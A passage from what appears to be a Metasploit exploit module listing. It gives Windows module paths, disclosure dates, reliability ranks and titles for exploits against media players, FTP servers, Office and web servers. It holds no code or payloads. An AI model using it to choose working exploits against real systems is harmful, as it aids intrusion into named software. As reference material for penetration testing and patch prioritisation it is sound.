Use After Free - windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow - windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow - windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow - windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow - windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow - windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow - windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow - windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow - windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow - windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow - windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow - windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow - windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow - windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability - windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow - windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow - windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow - windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) - windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow - windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow - windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow - windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow - windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow - windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow - windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow - windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow - windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability - windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow - windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit - windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow - windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow - windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow - windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow - windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow - windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow - windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow - windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow - windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow - windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow - windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow - windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow - windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO - windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer Overflow - windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow - windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow - windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow - windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow - windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write - windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow - windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF - windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow - windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow - windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow - windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow - windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow - windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow - windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow - windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow - windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile - windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow - windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow - windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow - windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow - windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow - windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow - windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow - windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow - windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow - windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan ShowReport Remote Command Execution - windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow - windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) - windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow - windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow - windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow - windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow - windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow - windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow - windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow - windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow - windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability - windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow - windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow - windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) - windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow - windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow - windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability - windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow - windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution - windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion - windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python - windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability - windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow - windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow - windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution - windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow - windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow - windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution - windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow - windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery - windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 - windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities - windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution - windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow - windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow - windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow - windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow - windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow - windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) - windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability - windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow - windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow - windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow - windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow - windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow - windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow - windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow - windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow - windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow - windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow - windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow - windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow - windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability - windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow - windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow - windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow - windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow - windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) - windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow - windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro - windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability - windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability - windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free - windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow - windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow - windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow - windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption - windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow - windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow - windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) - windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow - windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing - windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow - windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) - windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow - windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) - windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow - windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow - windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow - windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow - windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow - windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow - windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow - windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow - windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) - windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow - windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow - windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow - windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow - windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow - windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability - windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String - windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow - windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow - windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow - windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow - windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version - windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow - windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow - windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload - windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow - windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow - windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) - windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow - windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow - windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow - windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow - windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow - windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow - windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow - windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability - windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow - windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow - windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow - windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow - windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow - windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow - windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) - windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload - windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) - windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) - windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command - windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow - windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow - windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability - windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow - windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow - windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow - windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow - windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow - windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow - windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow - windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow - windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow - windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow - windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow - windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption - windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow - windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow - windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow - windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow - windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution - windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow - windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow - windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow - windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow - windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow - windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow - windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow - windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) - windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute - windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow - windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow - windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow - windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding - windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow - windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow - windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution - windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow - windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow - windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow - windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow - windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow - windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow - windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure - windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow - windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection - windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection - windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow - windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute - windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection - windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload - windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload - windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow - windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow - windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow - windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow - windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow - windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow - windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow - windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) - windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow - windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow - windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow - windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow - windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow - windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow - windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow - windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution - windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution - windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow - windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability - windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server 